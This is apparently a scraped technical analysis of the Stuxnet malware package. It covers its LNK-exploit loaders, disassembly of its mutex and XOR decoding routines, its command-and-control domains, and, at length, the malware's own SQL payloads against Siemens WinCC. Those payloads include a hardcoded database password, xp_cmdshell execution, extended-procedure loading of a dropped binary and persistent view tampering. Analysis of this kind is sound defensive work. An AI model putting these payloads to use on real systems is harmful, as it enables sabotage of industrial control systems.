Stuxnet

STUXNET MALWARE PACKAGE
Components Tree
.LNK files
~WTRxxxx.tmp dlls
Extracted/decompressed dll
MRXxxx.sys drivers
2 Embedded Wrapper.dll
Embedded .exe template
Embedded .lnk template
Embedded ~WTR4141.tmp
Embedded .cab file
Another .dll
Two .dat files
Components Breakdown
Copy of Shortcut
to.lnk
Copy of Copy of Shortcut
to.lnk
Copy of Copy of Copy of
Shortcut to.lnk
Copy of Copy of Copy of Copy of
Shortcut to.lnk
~WTR4141.tmp
CVE-2010-2568: LNK/PIF files

Automatic Execution
Vulnerability
Launches ~WTR4141.tmp
within the Windows Shell
process
DLL ~26 KB Initial loader
Hook user-mode File APIs to
hide files from the Windows
Shell process
Hook user-mode Section APIs
to allow loading a dll from a
non-existent file (perhaps to
mask the dll name?), or from
memory
Loads ~WTR4132.tmp using
custom dll loading, then calls
~WTR4132.tmp
DLL ~506 KB second phase

loader
Shares code bases with
~WTR4141
UPX unpacks embedded data
into memory
Hook user mode Section APIs
(as above)
Load unpacked data as a DLL
from memory, then call an
exported function
Embedded UPX dll from ~WTR4132.tmp

Referred to as Stuxnet.dll in this report
DLL ~1250 KB
This is the main Trojan
Many exported functions
Many embedded resources
Many capabilities
This is what we will focus on
Stuxnet timeline
1/1/2009 10:50:28AM Stuxnet Generic PE Template
Timestamp
1/1/2009 10:53:25AM MRxcls.sys Timestamp
1/13/2010 2:00:53AM lsass inject template

Timestamp
1/25/2010 6:39:24AM MRxnet.sys Timestamp
2/3/2010 4:15:29AM UTC ~WTR4141.tmp signed
2/28/2010 9:54:43PM Stuxnet primary Trojan
Timestamp
6/??/2010: Stuxnet detected

6/12/2010: RealTek certificate used by Stuxnet
drivers Expired
7/16/2010: RealTek certificate revoked
7/19/2010: Stuxnet variant with drivers signed by JMicron
detected
7/20/2010: JMicron certificate revoked
USB, Network Share, WebDav, or certain files types that

support embedding links
Infected drives/shares/files contain the following:
Shortcut files used to gain execution:
Copy of Shortcut to.lnk
Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Copy of Shortcut to.lnk
Actual Trojan binaries (dlls):

~WTR4141.tmp ~26KB
~WTR4132.tmp ~506KB
~WRT4141.tmp
CreateMutex format {%08x-%08x-%08x-%08x}, derived from current process id
mutations
100020A7
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
100020AD loc_100020AD:
100020AD
mov ecx,eax
100020AF
xor ecx,0x00049481
100020B5
push ecx
100020B6
mov edx,eax
100020B8
xor edx,0x05858721
100020BE
push edx
100020BF
mov ecx,eax
100020C1
xor ecx,0x0AE48481
100020C7
push ecx
100020C8
xor eax,0x05858AA3
100020CD
push eax
100020CE
lea edx,[esp+0x14]
100020D2
push 0x100054F8 // {%08x-%08x-%08x-%08x}
100020D7
push edx
100020D8
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]
10002137
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
1000213D loc_1000213D:
1000213D
mov ecx,eax
1000213F
xor ecx,0x04393481
10002145
push ecx
10002146
mov edx,eax
10002148
xor edx,0x05800097
1000214E
push edx
1000214F
mov ecx,eax
10002151
xor ecx,0x00040941
10002157
push ecx
10002158
xor eax,0x09487481
1000215D
push eax
1000215E
lea edx,[esp+0x14]
10002162
push 0x100054F8 // {%08x-%08x-%08x-%08x}
10002167
push edx
10002168
wsprintfW[00005AD2]
CreateMutex: {BE3533AB-2DDC-46a1-8F7B-F102B8A5C30A}
Generate SHELL32.DLL.ASLR.%08x, GetTickCount()

10002019
mov esi,dword ptr [0x1000508C] // __imp_KERNEL32.dll!
GetTickCount[00005998]
1000201F
call esi
10002021 loc_10002021:
10002021
mov ecx,eax
10002023
mov eax,0x24924925
10002028
mul ecx
1000202A
sub ecx,edx
1000202C
shr ecx,1
1000202E
add ecx,edx
10002030
shr ecx,0x2
10002033
mov edi,ecx
10002035
call esi
10002037 loc_10002037:
10002037
lea ecx,[0x00000000+eax*8]
1000203E
sub ecx,eax
10002040
add ecx,edi
10002042
push ecx
10002043
push 0x100054C4 // SHELL32.DLL.ASLR.
10002048
lea edx,[esp+0x1C]
1000204C
push 0x100054E8 // %s%08x
10002051
push edx
10002052
wsprintfW[00005AD2]
It also attempts to manipulate Total Commander, posting a keydown, keyup
sequence for 0x74 (t)
Hooks some low level ntdll calls to provide LoadDLLtoMemory functionality (see
section below):
ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwClose
ZwQueryAttributesFile
ZqQuerySection
Loads ~WTR4132.tmp into memory
SIMPLE XOR DECODING ROUTINES

Strings encoded using a simple xor 0x12:
100036C1 loc_100036C1:
100036C1
mov dl,byte ptr [eax]
100036C3
xor dl,0x12
100036C6
mov byte ptr [ecx],dl
100036C8
jne 0x100036BE // loc_100036BE
100036CA loc_100036CA:
or xor 0xAE12
100036F1
100036F1
100036F2
100036F2
100036F3
100036F4
100036F7
100036F8
100036F9
100036FE
10003701
10003704
10003706
10003706
10003707
10003707
loc_100036F1:
push edi
loc_100036F2:
inc ecx
inc ecx
mov ax,word ptr [ecx]
inc edx
inc edx
mov edi,0xAE12
xor ax,di
mov word ptr [edx],ax
jne 0x100036F2 // loc_100036F2
loc_10003706:
pop edi
loc_10003707:
ret
NTDLL Hooking to custom load DLLs from memory or to

hide DLL name
Hooks some low level ntdll calls to provide LoadDLLtoMemory functionality:
ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwClose
ZwQueryAttributesFile
ZqQuerySection
TODO: Add detail
~WTR4132.TMP
Large dll, custom loaded by first wtr tmp. Mostly contains a UPX packed dll. Utilizes
special loading methods very similar to first wtr tmp to custom extract and load the
dll in memory.
STUXNET.DLL
COMMAND AND CONTROL

The Stuxnet.dll contains code to validate internet connectivity using the following
domains (obtained with a recon trace):
ECX: 0x00FDF7B8 Unicode: www.windowsupdate.com
ECX: 0x00FDF838 Unicode: www.msn.com
However, these domains are not actually contacted and the C&C goes straight to
trying to HTTP connect to the following domains (obtained with a recon trace):
ECX: 0x00FDF8B8 Unicode: www.mypremierfutbol.com
ECX: 0x00FDF9B8 Unicode: www.todaysfutbol.com
ECX: 0x00FDF938 Unicode: index.php?data
TODO: Finish details
Siemens Step 7 / WinCC

The Stuxnet.dll contains code to access the Siemens Step 7 industrial automation
system. It uses a hardcoded uid and password
(uid=WinCCConnect;pwd=2WSXcder) to connect to the database server and
execute commands to dump database tables to disk and possibly inject/execute a
binary on the database server.
view MCPVPROJECT2 as select MCPTPROJECT.PROJECTID,
MCPTPROJECT.PROJECTNAME, MCPTPROJECT.PROJECTVERSION,
MCPTPROJECT.PROJECTMODE, MCPTPROJECT.PROJECTCREATOR,
MCPTPROJECT.PROJECTEDITOR, MCPTPROJECT.CREATIONDATE,
MCPTPROJECT.EDITDATE, MCPTPROJECT.PRJCOMMENT,
MCPTPROJECT.CSLANGUAGE, MCPTPROJECT.RTLANGUAGE,
MCPTPROJECT.PROJECTGUID, MCPTPROJECT.PRJTABLETYPES,
MCPTPROJECT.PRJDATATYPES, MCPTPROJECT.PRJCREATEVERMAJ,
MCPTPROJECT.PRJCREATEVERMIN, MCPTPROJECT.PRJXRES,
MCPTPROJECT.PRJTIMEMODE, MCPTPROJECT.PRJDELTAMODE,
MCPTPROJECT.PRJDELTAREMOTE from MCPTPROJECT
view MCPVPROJECT2 as select
MCPTPROJECT.PROJECTID,MCPTPROJECT.PROJECTNAME,MCPTPROJECT.PROJECTVERSI
ON,MCPTPROJECT.PROJECTMODE,MCPTPROJECT.PROJECTCREATOR,MCPTPROJECT.PR
OJECTEDITOR,MCPTPROJECT.CREATIONDATE,MCPTPROJECT.EDITDATE,MCPTPROJECT.
PRJCOMMENT,MCPTPROJECT.CSLANGUAGE,MCPTPROJECT.RTLANGUAGE,MCPTPROJE
CT.PROJECTGUID,MCPTPROJECT.PRJTABLETYPES,MCPTPROJECT.PRJDATATYPES,MCPTP
ROJECT.PRJCREATEVERMAJ,MCPTPROJECT.PRJCREATEVERMIN,MCPTPROJECT.PRJXRES,
MCPTPROJECT.PRJTIMEMODE,MCPTPROJECT.PRJDELTAMODE,MCPTPROJECT.PRJDELTA
REMOTE from MCPTPROJECT
view MCPVPROJECT2 as select
PROJECTID,PROJECTNAME,PROJECTVERSION,PROJECTMODE,PROJECTCREATOR,PROJE
CTEDITOR,CREATIONDATE,EDITDATE,PRJCOMMENT,CSLANGUAGE,RTLANGUAGE,PROJ
ECTGUID,PRJTABLETYPES,PRJDATATYPES,PRJCREATEVERMAJ,PRJCREATEVERMIN,PRJX
RES,PRJTIMEMODE,PRJDELTAMODE,PRJDELTAREMOTE from MCPTPROJECT where
((SELECT top 1 1 FROM MCPVREADVARPERCON)='1')
view MCPVREADVARPERCON as
select MCPTVARIABLEDESC.VARIABLEID,
MCPTVARIABLEDESC.VARIABLETYPEID,
MCPTVARIABLEDESC.FORMATFITTING,
MCPTVARIABLEDESC.SCALEID,
MCPTVARIABLEDESC.VARIABLENAME,
MCPTVARIABLEDESC.ADDRESSPARAMETER,
MCPTVARIABLEDESC.PROTOKOLL,
MCPTVARIABLEDESC.MAXLIMIT,
MCPTVARIABLEDESC.MINLIMIT,
MCPTVARIABLEDESC.STARTVALUE,
MCPTVARIABLEDESC.SUBSTVALUE,
MCPTVARIABLEDESC.VARFLAGS,
MCPTVARIABLEDESC.CONNECTIONID,
MCPTVARIABLEDESC.VARPROPERTY,
MCPTVARIABLEDESC.CYCLETIMEID,
MCPTVARIABLEDESC.LASTCHANGE,
MCPTVARIABLEDESC.ASDATASIZE,
MCPTVARIABLEDESC.OSDATASIZE,
MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES,
MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM1,
MCPTVARIABLEDESC.SCALEPARAM4
from MCPTVARIABLEDESC
view MCPVREADVARPERCON as
select MCPTVARIABLEDESC.VARIABLEID,
MCPTVARIABLEDESC.VARIABLETYPEID, MCPTVARIABLEDESC.FORMATFITTING,
MCPTVARIABLEDESC.SCALEID,
MCPTVARIABLEDESC.VARIABLENAME,
MCPTVARIABLEDESC.ADDRESSPARAMETER, MCPTVARIABLEDESC.PROTOKOLL,
MCPTVARIABLEDESC.MAXLIMIT,
MCPTVARIABLEDESC.MINLIMIT,
MCPTVARIABLEDESC.STARTVALUE, MCPTVARIABLEDESC.SUBSTVALUE,
MCPTVARIABLEDESC.VARFLAGS,
MCPTVARIABLEDESC.CONNECTIONID,
MCPTVARIABLEDESC.VARPROPERTY, MCPTVARIABLEDESC.CYCLETIMEID,
MCPTVARIABLEDESC.LASTCHANGE, MCPTVARIABLEDESC.ASDATASIZE,
MCPTVARIABLEDESC.OSDATASIZE, MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES, MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC
view MCPVREADVARPERCON as select
MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIA
BLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIA
BLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKO
LL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDES
C.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,M
CPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIA
BLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASD
ATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPT
VARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCAL
ETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCP
TVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from
MCPTVARIABLEDESC
VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPA
RAMETER,PROTOKOLL,MAXLIMIT,MINLIMIT,STARTVALUE,SUBSTVALUE,VARFLAGS,CO
NNECTIONID,VARPROPERTY,CYCLETIMEID,LASTCHANGE,ASDATASIZE,OSDATASIZE,VA
RGROUPID,VARXRES,VARMARK,SCALETYPE,SCALEPARAM1,SCALEPARAM2,SCALEPAR
AM3,SCALEPARAM4 from
MCPTVARIABLEDESC,openrowset('SQLOLEDB','Server=.\WinCC;uid=WinCCConnect;
pwd=2WSXcder','select 0;declare @t varchar(999),@s varchar(999),@a int declare r
cursor for select filename from master..sysdatabases where (name like ''CC%'')
open r fetch next from r into @t while (@@fetch_status<>-1) begin set
@t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec
master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell
''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t=@t+''x'';dbcc
addextendedproc(sp_run,@t);exec master..sp_run;exec
master..sp_dropextendedproc sp_run;break;end fetch next from r into @t end close r

deallocate r')
pwd=2WSXcder','select 0;use master;declare @t varchar(999),@s
varchar(999);select @t=filename from master..sysdatabases where (name like ''CC
%'');set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';set
@s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t
= @t+''x'';dbcc addextendedproc(sprun,@t);exec master..sprun;exec
master..sp_dropextendedproc sprun')
pwd=2WSXcder','select 0;use master;declare @t varchar(999),@s
varchar(999);select @t=filename from master..sysdatabases where (name like ''CC
%R'');set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';set
@s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t
= @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;')
EXEC sp_dropextendedproc sp_dumpdbilog
((SELECT top 1 1 FROM MCPVREADVARPERCON)='1') --CC-SP
0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use
[?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CCS''''+char(80);if left(db_name(),2)=''''CC'''' select
@t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t
is not NULL exec(@t)'';exec sp_msforeachdb @z')
CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x
DECLARE @ashl int,
@aind varchar(260),
@ainf varchar(260),
@hr
int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq
EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings',
@aind OUT, '%
%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' EXEC
sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog EXEC
sp_dropextendedproc sp_dumpdbilog endq:
DECLARE @ashl int,

@aind varchar(260),
@ainf varchar(260),
@hr
@aind OUT, '%
%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @aods int,
@adss int,
@aip int,
@abf varbinary(4096) EXEC @hr
= sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr =
sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr =
sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT
DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss )
BEGIN SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog )
EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf IF @hr <> 0 GOTO endq SET
@aip = @aip + 4096 END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null,
@ainf, 2 IF @hr <> 0 GOTO endq EXEC sp_OAMethod @aods, 'Close', null endq:
DECLARE @ashl int,
@aind varchar(260),
@ainf varchar(260),
@hr
@aind OUT, '%
%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @fs int
EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO
endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq:
DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT
serverproperty('productversion') )) IF @vr > '9' BEGIN
EXEC sp_configure 'show
advanced options', 1 RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'Ole
Automation Procedures', 1
RECONFIGURE WITH OVERRIDE END
DROP TABLE sysbinlog
declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments
where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from
dbo.syscomments c, dbo.sysobjects o
where o.id = c.id and c.id =
object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set
@e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if
@f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from
fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM
MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s
varchar(999),@a int declare r cursor for select filename from master..sysdatabases
where (name like ''CC%'') open r fetch next from r into @t while
(@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))
+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s =
''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t =
@t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec
master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end
close r deallocate r --*' exec (@t)
declare @t varchar(4000), @e int, @f int if exists (select text from
dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select
@t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id
= object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t)
if @e=0 set @t=right(@t,len(@t)-7) else begin set
@f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set

@t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set
@t='alter
'+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXc
der'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set
@z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CCS''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select
@t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)charindex(@s,text)-8) from syscomments where text like
(''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb
@z'')' exec (@t)
exec master..sp_attach_db 'wincc_svr',N'%s',N'%s'
exec master..sp_detach_db 'wincc_svr'
Provider='%s';Data Source=%s;Initial Catalog='%s';User
ID='%s';Password='%s';Connection Timeout=%i;
select name from master..sysdatabases where filename like N'%s'
use [%s]
use master
use wincc_svr

Stuxnet

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Stuxnet

Uploaded by

Copyright:

Available Formats

STUXNET MALWARE PACKAGE

CVE-2010-2568: LNK/PIF files

DLL ~506 KB second phase

Embedded UPX dll from ~WTR4132.tmp

1/13/2010 2:00:53AM lsass inject template

6/??/2010: Stuxnet detected

USB, Network Share, WebDav, or certain files types that

Actual Trojan binaries (dlls):

Generate SHELL32.DLL.ASLR.%08x, GetTickCount()

SIMPLE XOR DECODING ROUTINES

NTDLL Hooking to custom load DLLs from memory or to

COMMAND AND CONTROL

Siemens Step 7 / WinCC

master..sp_dropextendedproc sp_run;break;end fetch next from r into @t end close r

DECLARE @ashl int,

@f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set

You might also like